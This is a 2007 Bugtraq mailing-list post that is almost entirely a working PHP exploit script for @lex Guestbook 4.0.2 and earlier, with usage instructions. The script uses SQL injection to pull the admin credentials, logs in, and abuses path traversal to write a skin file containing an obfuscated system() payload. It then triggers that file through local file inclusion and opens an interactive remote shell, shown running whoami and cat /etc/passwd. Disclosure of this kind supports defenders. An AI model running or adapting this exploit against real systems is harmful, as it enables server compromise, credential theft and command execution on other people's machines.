@lex Guestbook <= 4.0.2 Remote Command Execution Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
From: gmdarkfig@xxxxxxxxx
Date: 7 Jan 2007 08:52:34 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#!/usr/bin/php
<?php

/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");


/*/
 |
 | header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
 | header> ========================================================
 | status> Retrieving the administrator password
 | sploit> AdminUsername::root
 | sploit> AdminPassword::toor
 | status> Trying to get logged in
 | sploit> Done
 | status> Trying to add a skin
 | sploit> Done
 | status> Writing the malicious skin
 | $shell> whoami
 | darkfig
 |
 | $shell> cat /etc/passwd ...
 | 
/*/

if($argc < 2)
{
        print "\n---------------------------------------------------------";
        print "\nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version 
        print "\nPoc.ID........: 20070107";
        print "\nType..........: PHP Code Execution";
        print "\nRisk.level....: High";
        print "\nSrc.download..: www.alexphpteam.com";
        print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
        print "\nCredits.......: DarkFig";
        print "\n---------------------------------------------------------";
        print "\nUsage.........: php xpl.php <url>";
        print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
        print "\nExample.......: php xpl.php http://victim.com/@lexgb/";;
        print "\n---------------------------------------------------------\n";
        exit(1);
}

$url=$argv[1];
$prs=$argv[2];
$pra=$argv[3];

$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);

/*/
 |
 | index.php
 | =========
 | ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
 |
 | 
 | livre_include.php -> Local File Inclusion
 | =================
 | ... set_magic_quotes_runtime(0); // thx =)
 | ... if (isset($_GET['lang']) && $_GET['lang'] && 
file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext))
 | $f_language = str_replace("..","",$_GET['lang']); // We can't use .... 
because of file_exists() verification but ... =]
 | include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
 | 
 |
 |  index.php -> SQL Injection
 |  =========
 |  ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE 
lang='".$f_language."' and `type`='titre'"); 
 |  // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and 
type=`titre`
 | 
/*/

$sql = "index.php?lang=english.php%00'%20union%20select%20".
       "concat('XPLLogin:',(select%20login%20from%20alex_livr".
       "e_users%20LIMIT%201),'XPLPass:',(select%20pass%20from".
       "%20alex_livre_users%20LIMIT%201))/*";
       
print "\nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit";
print "\nheader> ========================================================";
print "\nstatus> Retrieving the administrator password";
$xpl->get($url.$sql);

if(preg_match('#<div 
class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#',$xpl->getcontent(),$count)) 
print "\nsploit> AdminUsername::".$count[1]."\nsploit> 
AdminPassword::".$count[2];
else die("\nsploit> Exploit failed");

print "\nstatus> Trying to get logged in";
$xpl->post($url."admin/index.php","f_login=".$count[1]."&f_pass=".$count[2]."&f_identif=Identification");
if(preg_match("#f_cadres\.php\?f_sid=([a-z0-9]{32})#",$xpl->getheader(),$sid)) 
print "\nsploit> Done";
else die("\nsploit> Exploit failed");

print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 
0755)
$xpl->post($url."admin/skins.php?f_sid=".$sid[1],"aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter");
if(!preg_match('#alert\("ERREUR\n#',$xpl->getcontent())) print "\nsploit> Done";
else die("\nsploit> Exploit failed");

$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).".
         "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).".
         "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).".
         "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45).".
         "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27).".
         "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52).".
         "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52).".
         "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)";

$data  = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit".
         "%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e".
         "val($scode);exit(0);\r\n?>&add_message=&nb_message_pa".
         "ge=&list_pages=&corps_messages=&space=&assembly=&enre".
         "gistrer=Enregistrer";

print "\nstatus> Writing the malicious skin\n\$shell> ";
// skins.php ... 
write($chem_absolu."templates/skins/".$_GET['skin_edit']."/".$tab_template_guestbook[$i])
$xpl->post($url."admin/skins.php?skin_edit=../../languages/d4h4x0rskin&f_sid=".$sid[1],$data);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
    $xpl->addheader("Referer",$cmd);
    $xpl->get($url."index.php?lang=d4h4x0rskin/alex_livre.css%00");
    print $xpl->getcontent();
    print "\n\$shell> ";
}

Prev by Date: Re: [Full-disclosure] 0trace - traceroute on established connections
Next by Date: AJLogin v3.5 Remote Password Disclosure Vulnerability
Previous by thread: Re: 0trace - traceroute on established connections
Next by thread: AJLogin v3.5 Remote Password Disclosure Vulnerability
Index(es):
- Date
- Thread